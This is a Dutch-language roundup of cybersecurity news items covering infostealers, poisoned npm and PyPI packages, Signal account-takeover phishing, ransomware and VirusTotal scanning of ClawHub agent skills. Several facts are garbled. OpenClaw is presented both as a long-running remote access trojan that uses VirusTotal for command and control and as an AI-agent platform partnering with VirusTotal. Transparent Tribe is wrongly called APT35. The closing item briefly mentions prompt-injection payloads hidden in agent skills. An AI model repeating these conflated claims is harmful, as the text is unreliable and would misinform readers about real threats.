Om zich te beschermen tegen OpenClaw, wordt macOS-gebruikers aangeraden om voorzichtig te zijn bij het installeren van browser extensies en alleen extensies te downloaden van officiële bronnen. Het is ook belangrijk om regelmatig de geïnstalleerde extensies te controleren en verdachte extensies te verwijderen. Daarnaast wordt aanbevolen om sterke, unieke wachtwoorden te gebruiken voor crypto-exchanges en om two-factor authenticatie in te schakelen waar mogelijk. Het updaten van macOS en browser software is eveneens cruciaal om te profiteren van de laatste beveiligingspatches. 1

Er is een nieuwe golf van Odyssey Stealer malware ontdekt. De malware is ontworpen om gevoelige informatie van geïnfecteerde systemen te stelen, waaronder wachtwoorden, creditcardgegevens en andere persoonlijke data.

De Odyssey Stealer wordt verspreid via verschillende methoden, waaronder phishing-e-mails, kwaadaardige advertenties en geïnfecteerde software-downloads. Eenmaal geïnstalleerd, nestelt de malware zich diep in het systeem en begint het met het verzamelen van gegevens. De gestolen informatie wordt vervolgens naar een command-and-control server gestuurd, waar de aanvallers toegang toe hebben.

De malware maakt gebruik van verschillende technieken om detectie te voorkomen, zoals het versleutelen van de communicatie met de command-and-control server en het gebruik van anti-debug mechanismen. Het is in staat om gegevens te stelen uit verschillende browsers, waaronder Chrome, Firefox en Edge. Daarnaast kan het ook informatie verzamelen uit e-mailclients, FTP-programma's en andere applicaties.

Cybersecurity experts waarschuwen voor de toename van deze malware en adviseren gebruikers om extra voorzichtig te zijn bij het openen van e-mails van onbekende afzenders, het downloaden van software van onbetrouwbare bronnen en het klikken op verdachte advertenties. Het is cruciaal om anti-virus software up-to-date te houden en regelmatig systeemscans uit te voeren. 1

Onderzoekers hebben een supply chain aanval ontdekt waarbij kwaadaardige versies van de dYdX Python en JavaScript pakketten zijn verspreid via de npm- en PyPI-repositories. Deze pakketten, met namen als "dydx-node", "dydx.js", "python-dydx" en "dydx", bevatten kwaadaardige code die gevoelige informatie steelt en mogelijk achterdeuren installeert.

De aanval werd ontdekt door security onderzoekers op 2 februari 2026. De kwaadaardige pakketten werden geïdentificeerd in de npm-repository en de PyPI-repository. De pakketten bevatten code die ontworpen is om omgevingvariabelen te verzamelen en deze naar een externe server te sturen.

De pakketten in de npm-repository, specifiek "dydx-node" en "dydx.js", bevatten een script dat na installatie automatisch werd uitgevoerd. Dit script verzamelde omgevingsvariabelen en verstuurde deze via een HTTP POST-request naar een externe server. De pakketten in de PyPI-repository, "python-dydx" en "dydx", bevatten vergelijkbare functionaliteit. Ze verzamelden ook omgevingsvariabelen en verstuurden deze naar een externe server.

De omgevingsvariabelen die door de malware werden verzameld, kunnen gevoelige informatie bevatten, zoals API-sleutels, wachtwoorden en andere credentials. Deze informatie kan door aanvallers worden gebruikt om toegang te krijgen tot systemen en data.

De onderzoekers adviseren ontwikkelaars om hun afhankelijkheden te controleren en alle geïnstalleerde pakketten te scannen op verdachte code. Indien een kwaadaardig pakket wordt gevonden, dient dit onmiddellijk te worden verwijderd en de credentials die mogelijk zijn blootgesteld, te worden geroteerd.

Het is van cruciaal belang dat ontwikkelaars zich bewust zijn van de risico's van supply chain aanvallen en maatregelen nemen om hun systemen te beschermen. Dit omvat het regelmatig controleren van afhankelijkheden, het scannen van pakketten op verdachte code en het gebruik van tools voor security monitoring. 1

Uit een recent onderzoek is gebleken dat aanvallers Windows screensaver bestanden (.scr) misbruiken om malware te verspreiden. Deze methode maakt het mogelijk om kwaadaardige code uit te voeren wanneer een gebruiker lange tijd inactief is en de screensaver wordt geactiveerd.

De aanval begint met het verspreiden van een .scr bestand, vaak via phishing of social engineering. Zodra het bestand is uitgevoerd, kan de malware verschillende acties uitvoeren, zoals het stelen van gegevens, het installeren van een achterdeur of het versleutelen van bestanden voor ransomware.

Een belangrijk aspect van deze aanval is dat .scr bestanden in feite uitvoerbare bestanden zijn. Dit betekent dat ze, net als .exe bestanden, code kunnen uitvoeren. Windows behandelt .scr bestanden als uitvoerbare bestanden, waardoor ze een aantrekkelijk doelwit zijn voor cybercriminelen.

Om zich tegen deze dreiging te beschermen, wordt aanbevolen om voorzichtig te zijn met het openen van .scr bestanden van onbekende bronnen. Het is ook belangrijk om de beveiligingsinstellingen van Windows aan te passen om te voorkomen dat uitvoerbare bestanden onbedoeld worden uitgevoerd. Regelmatige systeemscans met antivirussoftware kunnen ook helpen om malware te detecteren en te verwijderen. 1

Na een diepgaande analyse van de zogenaamde "Epstein-tool" hebben onderzoekers complexe code en datastructuren blootgelegd. Deze tool, waarvan de exacte functie nog steeds onderwerp van onderzoek is, bevat opvallende elementen die wijzen op geavanceerde programmeervaardigheden en een potentieel breed scala aan toepassingen.

De analyse onthult dat de tool gebruik maakt van Base64-codering, wat suggereert dat bepaalde delen van de code of data verborgen of versleuteld zijn om detectie te voorkomen of de analyse te bemoeilijken. Verder is er sprake van het gebruik van Terminal commando's.

De onderzoekers hebben zich gericht op het ontleden van de verschillende functies en modules binnen de tool. Hierbij is gekeken naar de manier waarop data wordt verwerkt, opgeslagen en eventueel verzonden. De datastructuren binnen de tool zijn complex en lijken ontworpen om grote hoeveelheden data efficiënt te kunnen verwerken. Er zijn aanwijzingen gevonden dat de tool mogelijk in staat is om data te verzamelen, analyseren en manipuleren.

Opvallend is de aanwezigheid van code die doet denken aan een script dat gedownload wordt van een remote server. Dit zou kunnen betekenen dat de tool in staat is om zichzelf te updaten of om extra functionaliteiten te downloaden. De exacte aard van deze functionaliteiten is nog niet vastgesteld, maar het geeft aan dat de tool flexibel en aanpasbaar is.

De onderzoekers benadrukken dat het nog te vroeg is om definitieve conclusies te trekken over de precieze functie en het doel van de Epstein-tool. Wel staat vast dat het om een complex stuk gereedschap gaat met potentieel vergaande mogelijkheden. Het onderzoek zal zich nu richten op het verder ontrafelen van de code en het identificeren van mogelijke toepassingen van de tool.1

Een nieuwe Advanced Persistent Threat (APT), genaamd Q-27, richt zich op bedrijfsomgevingen. De aanval maakt gebruik van geavanceerde technieken om systemen te compromitteren en gevoelige informatie te stelen.

De APT Q-27 maakt gebruik van een combinatie van phishing-aanvallen en malware-infecties om toegang te krijgen tot bedrijfsnetwerken. De phishing-e-mails bevatten kwaadaardige bijlagen of links die, wanneer geopend, een payload downloaden en uitvoeren. Deze payload installeert vervolgens malware op het systeem van het slachtoffer, waardoor de aanvallers controle krijgen over het geïnfecteerde apparaat.

Eenmaal binnen het netwerk, gebruiken de aanvallers laterale verplaatsingstechnieken om zich naar andere systemen te verplaatsen en hun aanwezigheid te vergroten. Ze maken gebruik van tools zoals PowerShell en Terminal commando's om hun acties uit te voeren en detectie te vermijden. De malware die door APT Q-27 wordt gebruikt, is ontworpen om data te exfiltreren, waaronder gevoelige bedrijfsdocumenten, financiële gegevens en persoonlijke informatie van werknemers.

De aanvallers maken gebruik van diverse methoden om de gestolen data te verzenden, waaronder het gebruik van versleutelde communicatiekanalen en het verbergen van de data in onschuldig ogende bestanden. Onderzoekers hebben vastgesteld dat APT Q-27 gebruikmaakt van Base64 encoding om hun commando's te verbergen en detectie te voorkomen.

Om zich te beschermen tegen APT Q-27, wordt aanbevolen om robuuste beveiligingsmaatregelen te implementeren, waaronder het trainen van werknemers in het herkennen van phishing-e-mails, het regelmatig updaten van software en systemen, en het implementeren van intrusion detection systemen. Het is ook belangrijk om netwerkverkeer te monitoren op verdachte activiteiten en om incident response plannen te hebben om snel te kunnen reageren op een mogelijke inbreuk.1

Gekraakte game-installatiebestanden worden opnieuw ingezet als distributiekanaal voor het stelen van inloggegevens. De meest recente aanvalsgolf maakt gebruik van kwaadaardige code die verborgen zit achter een Ren’Py game launcher. Deze loader, die de naam RenEngine heeft gekregen, wordt gebundeld met herverpakte games en modificaties die legitiem ogen en normaal functioneren. Op de achtergrond wordt echter stilletjes de volgende fase van de aanvalsketen voorbereid.

De campagne is al actief sinds april 2025 en heeft naar schatting wereldwijd vierhonderdduizend slachtoffers gemaakt. Telemetriegegevens suggereren dat er dagelijks ongeveer vijfduizend nieuwe infecties plaatsvinden. De hoogste concentraties van besmettingen zijn waargenomen in India, de Verenigde Staten en Brazilië. De omvang van deze campagne is significant omdat de initiële lokmethode leunt op het sociale vertrouwen binnen piraterijgemeenschappen in plaats van op softwarekwetsbaarheden. Dit maakt het moeilijk om de verspreiding te stoppen via traditionele software-patches.

Onderzoekers van Cyderes ontdekten de malware nadat zij kwaadaardige logica aantroffen in wat leek op een legitieme Ren’Py-gebaseerde launcher. In dezelfde gevallen analyseerden zij ook een nieuwe variant van HijackLoader. Deze variant bevat extra modules om analyse door beveiligingssoftware tegen te gaan, waaronder controles op GPU’s, namen van hypervisors en MAC-adressen die gekoppeld zijn aan virtuele machines. RenEngine en HijackLoader vormen samen een tweeledige setup die de beheerders in staat stelt om payloads snel te wisselen wanneer verdedigingsmechanismen veranderen. Een typische infectie start wanneer een gebruiker de illegale installer uitvoert, waarna RenEngine de tweede fase ontsleutelt en start. 1

Onderzoekers van Praetorian hebben aangetoond hoe cybercriminelen moderne beveiligingsmaatregelen omzeilen door ogenschijnlijk kleine kwetsbaarheden in webapplicaties aan elkaar te koppelen. Het gaat hierbij specifiek om het misbruik van legitieme functies zoals nieuwsbriefaanmeldingen, contactformulieren en wachtwoordherstelopties. Hoewel deze afzonderlijke fouten op zichzelf beheersbaar lijken, leidt de combinatie ervan tot een volledige overname van Microsoft 365-omgevingen.

Aanvallers maken gebruik van fouten in de bedrijfslogica door invoervelden van publiek toegankelijke API-endpoints te manipuleren. Hierdoor wordt de eigen infrastructuur van een organisatie gedwongen om kwaadaardige e-mails te verzenden. Omdat deze berichten afkomstig zijn van geautoriseerde servers, passeren zij strenge authenticatiecontroles zoals SPF en DMARC. Dit zorgt ervoor dat phishing-berichten direct in de primaire inbox van slachtoffers belanden, waarbij het inherente vertrouwen in het domein van de eigen organisatie wordt misbruikt.

De ernst van deze aanvalsketen escaleert aanzienlijk wanneer deze e-mailfout wordt gecombineerd met onjuiste foutafhandeling in cloudomgevingen. Interne diensten maken vaak gebruik van OAuth-tokens voor onderlinge authenticatie. Wanneer een applicatie uitgebreide foutmeldingen weergeeft voor debugging-doeleinden, kunnen misvormde verzoeken ertoe leiden dat gevoelige OAuth 2.0 bearer-tokens samen met stack traces worden gelekt. Door deze tokens te kapen, verkrijgen aanvallers ongeoorloofde toegang tot de volledige cloudomgeving. 1

De Duitse binnenlandse inlichtingendienst waarschuwt voor phishingaanvallen gericht op hooggeplaatste personen via messaging apps zoals Signal. Vermoedelijk worden deze aanvallen uitgevoerd door door de staat gesteunde actoren. De aanvallen combineren social engineering met legitieme functies om gegevens te stelen van politici, militairen, diplomaten en onderzoeksjournalisten in Duitsland en de rest van Europa. De veiligheidswaarschuwing is gebaseerd op inlichtingen verzameld door het Bundesamt für Verfassungsschutz (BfV) en het Bundesamt für Sicherheit in der Informationstechnik (BSI).

Volgens de waarschuwing maken de aanvallers geen gebruik van malware of technische kwetsbaarheden in de messaging diensten. De aanvallers nemen rechtstreeks contact op met het doelwit, waarbij ze zich voordoen als het support team van de messaging service of de support chatbot. Het doel is om heimelijk toegang te krijgen tot één-op-één en groepschats, evenals contactlijsten van de getroffen personen. Er zijn twee varianten van deze aanvallen: één die een volledige account overname uitvoert, en één die de account koppelt aan het apparaat van de aanvaller om chatactiviteit te monitoren.

In de eerste variant doen de aanvallers zich voor als de support service van Signal en sturen ze een valse veiligheidswaarschuwing om een gevoel van urgentie te creëren. Het doelwit wordt vervolgens misleid om hun Signal PIN of een SMS verificatiecode te delen, waardoor de aanvallers de account kunnen registreren op een apparaat dat ze controleren. Vervolgens kapen ze de account en sluiten ze het slachtoffer buiten.

In het tweede geval gebruikt de aanvaller een plausibele list om het doelwit te overtuigen een QR-code te scannen. Dit maakt misbruik van de legitieme functie van Signal waarmee een account aan meerdere apparaten kan worden gekoppeld (computer, tablet, telefoon). Het resultaat is dat de account van het slachtoffer wordt gekoppeld aan een apparaat dat wordt beheerd door de kwaadwillende, die toegang krijgt tot chats en contacten zonder argwaan te wekken.

Hoewel Signal alle apparaten vermeldt die aan de account zijn gekoppeld onder Instellingen > Gekoppelde apparaten, controleren gebruikers dit zelden. Dergelijke aanvallen zijn waargenomen op Signal, maar de bulletin waarschuwt dat WhatsApp ook een vergelijkbare functionaliteit ondersteunt en op dezelfde manier kan worden misbruikt.

Google threat researchers meldden vorig jaar dat de QR-code koppeltechniek werd gebruikt door Russische door de staat gesteunde dreigingsgroepen zoals Sandworm. Ukraine’s Computer Emergency Response Team (CERT-UA) schreef soortgelijke aanvallen toe aan Russische hackers, gericht op WhatsApp accounts. Echter, meerdere dreigingsactoren, waaronder cybercriminelen, hebben de techniek sindsdien overgenomen in campagnes zoals GhostPairing om accounts te kapen voor scams en fraude.

De Duitse autoriteiten adviseren gebruikers om geen Signal berichten te beantwoorden van vermeende support accounts, omdat het messaging platform nooit rechtstreeks contact opneemt met gebruikers. In plaats daarvan wordt aangeraden deze accounts te blokkeren en te rapporteren. Als extra veiligheidsmaatregel kunnen Signal gebruikers de optie 'Registratievergrendeling' inschakelen onder Instellingen > Account. Eenmaal actief, zal Signal vragen om een PIN die u instelt wanneer iemand probeert uw telefoonnummer te registreren bij de applicatie. Zonder de PIN code mislukt de Signal accountregistratie op een ander apparaat. Omdat de code essentieel is voor registratie, kan het verlies ervan leiden tot het verlies van toegang tot de account. Het wordt ook sterk aanbevolen dat gebruikers regelmatig de lijst met apparaten met toegang tot uw Signal account controleren onder Instellingen → Gekoppelde apparaten, en onbekende apparaten verwijderen.

Bron: BSI

Een 27-jarige Amerikaan heeft bekend dat hij door middel van phishingaanvallen de beveiligingscodes van 570 Snapchat-accounts heeft gestolen. Tussen mei 2020 en februari 2021 maakte de verdachte gebruik van social engineering om e-mailadressen, telefoonnummers en Snapchat-gebruikersnamen van slachtoffers te verzamelen.

De verdachte gebruikte deze informatie om in te loggen op Snapchat-accounts. Snapchat stuurde vervolgens beveiligingscodes naar de slachtoffers. De verdachte deed zich voor als een Snap-medewerker via een "geanonimiseerd telefoonnummer" en stuurde naar meer dan 4500 slachtoffers een sms-bericht waarin hij om de beveiligingscode vroeg. 570 vrouwen verstrekten deze code aan de verdachte.

Met de verkregen codes kon de man inloggen op de Snapchat-accounts. Bij zeker 59 vrouwelijke slachtoffers werden naaktfoto's gestolen. De gestolen afbeeldingen werden verkocht of verhandeld op internet. De man adverteerde zijn "diensten" om op Snapchat-accounts in te breken ook op internet. Bij een schuldbekentenis kan de Amerikaan worden veroordeeld tot een gevangenisstraf van meer dan 30 jaar en een boete van 1 miljoen dollar.

Bron: U.S. Department of Justice

Een nieuwe campagne van de APT-groep Transparent Tribe, ook bekend als APT35, Mythic Leopard en TEMP.Isotope, richt zich op de Indiase overheid, defensie en aanverwante sectoren. Dat blijkt uit onderzoek van cybersecuritybedrijf Qi-An Xin. De groep gebruikt een nieuw Remote Access Trojan (RAT) genaamd "DarkRaven" en een verbeterde versie van hun bestaande RAT "Crimson".

De aanval begint met spear-phishing e-mails die zijn vermomd als berichten van overheidsinstanties of defensieorganisaties. Deze e-mails bevatten kwaadaardige documenten die, wanneer geopend, de DarkRaven RAT installeren. DarkRaven is in staat tot keylogging, het stelen van bestanden en het uitvoeren van willekeurige opdrachten.

Crimson RAT is een bekende tool van Transparent Tribe, maar de nieuwe versie bevat verbeterde obfuscatietechnieken om detectie te voorkomen. Deze RAT wordt ingezet via een vergelijkbaar spear-phishing mechanisme en biedt aanvallers toegang tot gevoelige informatie en systemen.

Transparent Tribe staat erom bekend dat ze zich richten op India en Pakistan, waarbij ze zich richten op militaire, diplomatieke en overheidsdoelen. De groep gebruikt vaak op maat gemaakte malware en social engineering-tactieken om hun doelstellingen te bereiken. De onderzoekers van Qi-An Xin waarschuwen voor de aanhoudende dreiging van deze APT-groep en adviseren organisaties in de getroffen sectoren om hun beveiligingsmaatregelen te versterken en medewerkers bewust te maken van spear-phishing aanvallen.

Bron: URL: 1

Uit een recent onderzoek is gebleken dat bulletproof hosting providers (BPH's) steeds vaker misbruik maken van de infrastructuur van legitieme internet service providers (ISP's) om hun activiteiten te maskeren en te faciliteren. Deze BPH's bieden onderdak aan cybercriminelen en faciliteren diverse illegale activiteiten, waaronder malware-distributie, phishing, en andere vormen van cyberaanvallen.

Het onderzoek toont aan dat BPH's complexe technieken gebruiken om detectie te ontwijken. Ze huren bijvoorbeeld servers en infrastructuur bij bonafide ISP's, waardoor het lastiger wordt om hun activiteiten te onderscheiden van die van legitieme klanten. Daarnaast maken ze gebruik van technieken zoals IP-spoofing en het verbergen van hun werkelijke locatie om hun sporen verder uit te wissen.

Een van de belangrijkste bevindingen is dat BPH's vaak gebruik maken van "fast flux" DNS-technieken. Hierbij wordt het IP-adres van een domein continu gewijzigd, waardoor het moeilijk wordt om de daadwerkelijke locatie van de server te achterhalen en de hosting provider te identificeren. Ook maken ze gebruik van gecompromitteerde servers en botnets om hun activiteiten te verspreiden en de belasting over verschillende locaties te verdelen.

De onderzoekers waarschuwen dat deze praktijken het opsporen en neutraliseren van cybercriminelen aanzienlijk bemoeilijken. Doordat BPH's gebruik maken van legitieme infrastructuur, wordt het lastiger voor wetshandhavingsinstanties en security onderzoekers om de bron van de cyberaanvallen te achterhalen en de verantwoordelijken te identificeren.

Het rapport benadrukt de noodzaak van een gezamenlijke aanpak om dit probleem aan te pakken. ISP's moeten proactief maatregelen nemen om misbruik van hun infrastructuur te voorkomen, bijvoorbeeld door het implementeren van strengere klant screening procedures en het monitoren van netwerkverkeer op verdachte activiteiten. Daarnaast is internationale samenwerking essentieel om BPH's die over de grenzen opereren effectief te kunnen bestrijden.

Bron: URL: 1

Onderzoekers hebben een nieuwe methode ontwikkeld om de operaties van kwaadwillende actoren in cloudomgevingen nauwkeuriger te identificeren door cloudwaarschuwingen te koppelen aan specifieke technieken uit het MITRE ATT&CK-raamwerk. Het onderscheiden van gerichte kwaadaardige activiteiten ten opzichte van normaal cloudgebruik is vaak complex voor beveiligingssystemen. Deze nieuwe benadering richt zich op het analyseren van patronen in cloudevents die een directe correlatie vertonen met het gedrag van bekende dreigingsgroepen. Voor dit onderzoek zijn cloudgebaseerde waarschuwingen uit tweeëntwintig verschillende sectoren geanalyseerd over de periode van juni 2024 tot juni 2025.

De methodiek maakt gebruik van vingerafdrukken op basis van gedrag, waarbij specifieke combinaties van waarschuwingen worden toegeschreven aan groepen zoals Muddled Libra en Silk Typhoon. Bij Muddled Libra zijn veelvoorkomende activiteiten onder meer het opvragen van gevoelige Azure-bronnen via de Microsoft Graph API en het exfiltreren van gegevens uit Microsoft 365 opslagdiensten. Deze groep maakt ook gebruik van technieken zoals het opsommen van cloudinfrastructuur en het uitvoeren van IAM-gerelateerde persistentie-operaties. Bij de analyse van specifieke sectoren, waaronder de luchtvaart, kwamen patronen naar voren die wijzen op gerichte verkenning en laterale bewegingen binnen cloudnetwerken.

De dreigingsgroep Silk Typhoon vertoont een ander patroon waarbij de nadruk ligt op het exfiltreren van gegevens uit opslagdiensten en het uitvoeren van processen met verdachte command-lines, zoals die geassocieerd worden met de Spring4Shell-kwetsbaarheid. Andere waargenomen technieken omvatten het downloaden van grote hoeveelheden codebestanden uit SaaS-diensten en het verwijderen van meerdere cloudbronnen. De analyse van waarschuwingen toont aan dat bepaalde tactieken, zoals discovery en credential access, consequent leiden tot specifieke meldingen over het downloaden van objecten uit opslagbuckets of het opsommen van identiteitsrechten. Deze systematische mapping stelt organisaties in staat om dreigingen in de cloud te categoriseren op basis van de werkelijke gedragingen van aanvallers in plaats van louter te vertrouwen op individuele incidentmeldingen.

Bron 1

Op een platform voor cybercriminaliteit wordt een dataset aangeboden die 79.000 leads bevat van personen die geïnteresseerd zijn in cryptocurrency. De vraagprijs voor deze informatie bedraagt 5.000 dollar waarbij de verkoper aangeeft dat er slechts één kopie van de gegevens beschikbaar is. De data is naar verluidt verzameld via diverse advertentiecampagnes en bevat gedetailleerde informatie over een groot aantal unieke gebruikers.

De dataset omvat specifiek 78.841 unieke telefoonnummers en 79.415 unieke e-mailadressen. De getroffen personen bevinden zich in meer dan 25 verschillende landen waaronder Australië, het Verenigd Koninkrijk, Canada en Frankrijk. Naast de contactgegevens bevatten de records ook namen, de datums waarop personen zich hebben geregistreerd en specifieke landinformatie. Door de aard van de gegevens en de wereldwijde spreiding vormt deze verkoop een potentieel risico voor gebruikers in diverse regio's die betrokken zijn bij digitale valuta.

Het Amerikaanse betalingsplatform BridgePay Network Solutions heeft bevestigd dat een ransomware-aanval de oorzaak is van een grootschalige storing die diverse diensten heeft getroffen. De problemen begonnen op vrijdag en leidden snel tot een landelijke verstoring van het BridgePay-platform.

Het bedrijf bevestigde laat op vrijdag dat de storing veroorzaakt werd door ransomware. BridgePay heeft de federale wetshandhaving ingeschakeld, waaronder de FBI en de U.S. Secret Service, evenals externe forensische- en herstelteams. Volgens een update van 6 februari is er geen bewijs dat betaalkaartgegevens zijn gecompromitteerd. De bestanden die mogelijk zijn geraakt, zijn versleuteld en er zijn geen aanwijzingen dat bruikbare data is blootgesteld. BridgePay heeft de naam van de ransomwaregroep nog niet bekendgemaakt.

Rond dezelfde tijd dat BridgePay de aanval bekendmaakte, meldden diverse Amerikaanse winkeliers en organisaties dat ze alleen contant geld konden accepteren vanwege een landelijke storing in de kaartverwerking. Een restaurant meldde dat de creditcardverwerker getroffen was door een cyberaanval, waardoor kaartbetalingen landelijk niet mogelijk waren. De stad Palm Bay, Florida, maakte bekend dat het online betaalportaal voor facturen niet beschikbaar is vanwege de problemen bij BridgePay Network Solutions. Ook Lightspeed Commerce, ThriftTrac en de stad Frisco, Texas, hebben melding gemaakt van serviceproblemen als gevolg van het incident.

De statuspagina van BridgePay toonde grote storingen in de belangrijkste productiesystemen, waaronder: BridgePay Gateway API (BridgeComm), PayGuardian Cloud API, MyBridgePay virtuele terminal en rapportage, Hosted payment pages en PathwayLink gateway en boarding portals. De eerste tekenen van problemen verschenen rond 03:29 uur, toen monitoring een verminderde prestatie detecteerde in meerdere services, beginnend met de "Gateway.Itstgate.com - virtual terminal, reporting, API"-systemen. De storing breidde zich uiteindelijk uit tot een volledige systeemuitval.

BridgePay meldt dat het herstel enige tijd kan duren en op een veilige en verantwoorde manier wordt uitgevoerd, terwijl het forensisch onderzoek doorgaat.

Bron: BridgePay

Een nieuwe variant van de OpenClaw Remote Access Trojan (RAT) maakt gebruik van de infrastructuur van VirusTotal voor command-and-control (C2) communicatie. Deze bevinding werd onlangs gepubliceerd. De malware, die al sinds 2020 actief is, staat bekend om zijn vermogen om op afstand toegang te krijgen tot systemen en gevoelige informatie te stelen.

De onderzoekers ontdekten dat de nieuwste versie van OpenClaw gebruikmaakt van de publieke API van VirusTotal om commando's van de aanvallers te ontvangen en resultaten terug te sturen. Dit gebeurt door kwaadaardige code te verstoppen in de metadata van bestanden die naar VirusTotal worden geüpload. De geïnfecteerde systemen lezen deze verborgen commando's uit de geüploade bestanden, waardoor de aanvallers controle kunnen uitoefenen zonder direct met de geïnfecteerde machines te communiceren.

Deze techniek maakt detectie lastiger, omdat het verkeer naar en van VirusTotal als legitiem wordt beschouwd. Bovendien maakt het gebruik van een bekende en vertrouwde dienst het voor security teams moeilijker om kwaadaardige activiteiten te onderscheiden van normaal netwerkverkeer.

OpenClaw staat bekend om zijn modulaire structuur, waardoor het flexibel kan worden ingezet voor verschillende doeleinden, waaronder keylogging, het stelen van inloggegevens, het maken van screenshots en het uitvoeren van willekeurige code. De malware richt zich voornamelijk op Windows-systemen en wordt verspreid via phishing-campagnes en geïnfecteerde software.

Security-experts adviseren organisaties om hun netwerkverkeer nauwlettend in de gaten te houden en ongebruikelijke activiteiten te onderzoeken, zelfs als deze afkomstig zijn van bekende diensten zoals VirusTotal. Het is ook belangrijk om medewerkers bewust te maken van de risico's van phishing en hen aan te moedigen om verdachte e-mails en bestanden te melden. Daarnaast wordt aanbevolen om endpoint detection and response (EDR) systemen te gebruiken die in staat zijn om afwijkend gedrag te detecteren, zelfs als de malware gebruikmaakt van geavanceerde technieken om detectie te omzeilen.

Bron: URL: 1

Cybercriminelen maken steeds vaker gebruik van cybersquatting-aanvallen om hun slachtoffers te misleiden en malware te verspreiden. Bij cybersquatting registreren aanvallers domeinnamen die lijken op die van legitieme bedrijven of merken, vaak met kleine spelfouten of variaties. Deze malafide domeinen worden vervolgens gebruikt voor verschillende kwaadaardige doeleinden, waaronder phishing-campagnes, malware-distributie en het verspreiden van valse informatie.

Een van de meest voorkomende tactieken is het opzetten van phishing-sites die de inlogpagina's van bekende websites nabootsen. Gebruikers die per ongeluk op deze sites terechtkomen en hun inloggegevens invoeren, geven zo onbewust hun persoonlijke informatie aan de aanvallers. Deze gestolen gegevens kunnen vervolgens worden gebruikt voor identiteitsdiefstal, financiële fraude of andere criminele activiteiten.

Daarnaast kunnen cybersquatters de nagemaakte domeinen gebruiken om malware te verspreiden. Bezoekers die de site bezoeken, kunnen worden gevraagd om een bestand te downloaden dat zogenaamd een update of een nuttig programma is, maar in werkelijkheid schadelijke software bevat. Deze malware kan vervolgens worden gebruikt om de computers van de slachtoffers te infecteren, hun gegevens te stelen of hun systemen te gijzelen.

Een andere variant van cybersquatting is het verspreiden van valse informatie. Aanvallers kunnen de nagemaakte domeinen gebruiken om nepnieuws of propaganda te verspreiden, met als doel de publieke opinie te beïnvloeden of schade toe te brengen aan de reputatie van een bedrijf of merk. Dit kan leiden tot verwarring, paniek en zelfs financiële verliezen voor de slachtoffers.

Om zich te beschermen tegen cybersquatting-aanvallen, is het belangrijk om alert te zijn op verdachte domeinnamen en websites. Controleer altijd de URL voordat u persoonlijke informatie invoert of bestanden downloadt. Wees extra voorzichtig met links die u ontvangt via e-mail of sociale media, en vermijd het klikken op links van onbekende afzenders. Het is ook raadzaam om een goede antivirus- en antimalware-oplossing te gebruiken en uw software regelmatig bij te werken om uzelf te beschermen tegen de nieuwste bedreigingen.

Door bewust te zijn van de risico's en de juiste voorzorgsmaatregelen te nemen, kunnen gebruikers en organisaties zich beter beschermen tegen de schadelijke gevolgen van cybersquatting-aanvallen.

Bron: URL: 1

Op 7 februari 2026 is de opkomst van een nieuwe speler in het ransomware-landschap gemeld onder de naam Insomnia. Deze groep is onlangs geïndexeerd op dreigingsinformatieplatformen nadat zij reeds meer dan vijftien slachtoffers op hun lijst hebben geplaatst. De getroffen organisaties zijn wereldwijd verspreid en zijn actief binnen diverse sectoren, wat duidt op een brede doelgerichtheid van de groep.

De verschijning van Insomnia markeert een trend in het begin van 2026 waarbij het tempo waarin nieuwe ransomware-collectieven ontstaan hoog ligt. In de eerste weken van het jaar zijn er reeds vijf nieuwe groepen geïdentificeerd. Deze ontwikkeling onderstreept de voortdurende dynamiek en de snelle opeenvolging van nieuwe actoren binnen het ecosysteem van digitale afpersing.

ReversingLabs heeft een kwaadaardig npm-pakket ontdekt dat zich richt op Atomic- en Exodus-wallets. De malware kaapt stilletjes crypto-overdrachten via software patching.

De aanvalsmethode omvat het heimelijk wijzigen van softwarecode om crypto-transacties te onderscheppen en om te leiden. Door zich te richten op populaire wallets zoals Atomic en Exodus, kunnen aanvallers een aanzienlijk aantal gebruikers treffen. De malware wordt verspreid via het npm-pakketbeheer, een veelgebruikte tool voor JavaScript-ontwikkelaars. Dit maakt het voor aanvallers mogelijk om de malware te verbergen binnen legitieme softwareprojecten en deze op grote schaal te verspreiden.

De exacte technische details van de malware en de specifieke patches die worden gebruikt om de crypto-overdrachten te kapen, worden niet in het artikel beschreven. Het artikel waarschuwt gebruikers van Atomic- en Exodus-wallets om extra voorzichtig te zijn en hun software regelmatig te updaten om zich te beschermen tegen potentiële aanvallen. Ontwikkelaars wordt geadviseerd om de integriteit van hun npm-pakketten te controleren en verdachte activiteiten te melden.

Bron: ReversingLabs

OpenClaw, voorheen bekend als Moltbot en Clawdbot, heeft aangekondigd een samenwerking met VirusTotal (van Google) om skills die worden geüpload naar ClawHub, de skill marketplace, te scannen. Dit is onderdeel van bredere inspanningen om de veiligheid van het agentic ecosystem te versterken.

Volgens OpenClaw-oprichter Peter Steinberger, Jamieson O'Reilly en Bernardo Quintero worden alle skills die op ClawHub worden gepubliceerd nu gescand met behulp van VirusTotal's threat intelligence, inclusief de nieuwe Code Insight functionaliteit. Dit biedt een extra beveiligingslaag voor de OpenClaw-community.

Het proces omvat het creëren van een unieke SHA-256 hash voor elke skill en het controleren hiervan in de VirusTotal database. Indien er geen overeenkomst wordt gevonden, wordt de skill bundle geüpload naar de malware scanning tool voor verdere analyse met behulp van VirusTotal Code Insight. Skills met een "benign" Code Insight verdict worden automatisch goedgekeurd door ClawHub, terwijl verdachte skills worden gemarkeerd met een waarschuwing. Skills die als kwaadaardig worden beschouwd, worden geblokkeerd voor download. OpenClaw heeft aangegeven dat alle actieve skills dagelijks opnieuw worden gescand om te detecteren of eerder schone skills kwaadaardig zijn geworden.

OpenClaw waarschuwt dat VirusTotal scanning geen wondermiddel is en dat sommige kwaadaardige skills die een slim verborgen prompt injection payload gebruiken, mogelijk door de mazen van het net glippen. Naast de VirusTotal-samenwerking is het platform van plan om een uitgebreid threat model, een openbare security roadmap, een formeel security reporting proces en details over de security audit van de volledige codebase te publiceren.

Deze ontwikkeling volgt op rapporten die honderden kwaadaardige skills op ClawHub aantroffen, waarna OpenClaw een meldoptie toevoegde waarmee ingelogde gebruikers verdachte skills kunnen markeren. Analyses hebben aangetoond dat deze skills zich voordoen als legitieme tools, maar onderhuids kwaadaardige functionaliteit bevatten om data te exfiltreren, backdoors te injecteren voor remote access, of stealer malware te installeren.

Cisco merkte op dat AI-agents met systeemtoegang covert data-lek kanalen kunnen worden die traditionele data loss prevention, proxies en endpoint monitoring omzeilen. Modellen kunnen ook een execution orchestrator worden, waarbij de prompt zelf de instructie wordt en moeilijk te detecteren is met traditionele security tooling.

